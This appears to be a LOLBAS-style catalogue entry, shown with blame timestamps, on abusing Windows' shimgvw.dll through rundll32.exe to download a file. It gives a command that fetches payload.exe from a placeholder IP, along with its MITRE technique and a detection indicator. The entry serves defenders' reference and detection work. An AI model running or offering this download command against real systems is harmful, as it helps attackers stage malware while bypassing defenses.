2023-08-05 17:50:52 +02:00
---
Name : Shimgvw.dll
Description : Photo Gallery Viewer
Author : Eral4m
Created : 2021-01-06
Commands :
- Command : rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
2024-04-03 17:53:36 +02:00
Description : Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
2023-08-05 17:50:52 +02:00
Usecase : Download file from remote location.
Category : Download
Privileges : User
MitreID : T1105
OperatingSystem : Windows 10, Windows 11
2024-04-03 17:53:36 +02:00
Tags :
- Download : INetCache
2023-08-05 17:50:52 +02:00
Full_Path :
- Path : c:\windows\system32\shimgvw.dll
- Path : c:\windows\syswow64\shimgvw.dll
Detection :
- IOC : Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line
Resources :
- Link : https://twitter.com/eral4m/status/1479080793003671557
Acknowledgement :
- Person : Eral4m
Handle : '@eral4m'